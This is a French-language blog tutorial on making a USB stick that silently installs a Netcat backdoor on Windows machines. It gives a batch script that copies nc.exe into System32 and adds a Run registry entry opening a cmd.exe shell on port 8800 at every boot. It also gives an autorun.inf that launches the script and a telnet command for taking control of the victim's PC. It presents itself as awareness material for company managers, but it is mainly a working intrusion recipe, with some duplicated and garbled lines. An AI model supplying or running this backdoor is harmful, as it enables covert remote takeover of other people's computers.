Dans les articles précédents, nous avons vu comment créer une Clé USB rootkit qui récupère les mots de passe d’un ordinateur sous Windows. Aujourd’hui, nous allons voir comment créer une clé USB qui ouvre un backdoor sur une machine Windows.
Ce rootkit s’exécute automatiquement, crée un backdoor sur un PC Windows et vous permet prendre le contrôle d’un PC à distance.
Comme d’habitude l’objectif ce tutoriel, c’est de montrer aux dirigeants d’entreprises à quel point l’utilisation des clés USB peut être dangereux. Ce qui est valable pour les entreprises ne l’est pas moins pour les simples particuliers.
Prendre le contrôle d’un PC à distance
Pour prendre le contrôle d’un PC à distance avec une Clé USB, il faut suivre les étapes ci-dessus:
Télécharger l’outil Netcat
Tout d’abord, nous allons créer un nouveau dossier sur notre clé USB. Ensuite nous allons télécharger Netcat, un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.
Vous pouvez aussi utiliser l’outil Cryptcat, le clone de Netcat, à la seule condition que ce dernier chiffre ses communications.
Apres le téléchargement de Netcat, on le dé-zippe dans le dossier crée récemment.
Créer un script .bat
Ensuite nous allons créer un fichier backdoor.bat. Ce petit fichier à deux objectifs:
- Copier les fichiers du Netcat dans le dossier System32 de l’ordinateur cible
- Ajouter une valeur chaîne dans le registre du PC victime pour que notre Backdoor se lance à chaque démarrage.
Pour cela, nous allons crée un nouveau document texte avec bloc note ou autres éditeur de texte et écrire le code ci-dessous:
copy *.* « %SYSTEMROOT%/System32 »
REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun » /v « backdoor » /t « REG_SZ » /d « %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »
REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun » /v « backdoor » /t « REG_SZ » /d « %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »
Créer un fichier autorun
Maintenant, il vous reste de créer le fichier autorun.inf
Dans cette étape, nous allons créé une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Dans cette étape, nous allons créé une nouvelle option dans la fenêtre qui apparaît à l’insertion d’une USB, qui nous permettra (une fois cliquez dessus) notre backdoor s’installe sur l’ordinateur cible.
Pour réaliser ceci, ouvrez un nouveau document texte puis insérez ce code :
[autorun]
open=backdoor.bat
ACTION= »donner un nom à cette action »
Enfin on enregistre le fichier sous la racine de la clé sous le nom autorun.inf
Mettre en ouvre le backdoor crée
Après l’insertion de la clé USB, vous pouvez à partir de n’importe quelle machine vous connectez sur le poste de la victime avec la commande suivante:
telnet 192.168.1.17 8800
192.168.1.17 désigne l’adresse IP de la machine distant qui vous faut remplacer. Et 8800 c’est le port utiliser pour se connecter.
Et voilà ! Avec cette technique vous serez en mesure de prendre le contrôle d’un PC à distance. Vous pouvez faire ce qui vous chante : ouvrir des fichiers, lancer une recherche, exécuter un programme…
Voici une liste des commandes pour bien manipuler la machine à distance: Lise des commandes Windows
Pour vous déconnecter, tapez « logout » .
Faites-en bon usage.
PS: cette astuce ne fonctionne pas sous Windows 10
Commentaires
Enregistrer un commentaire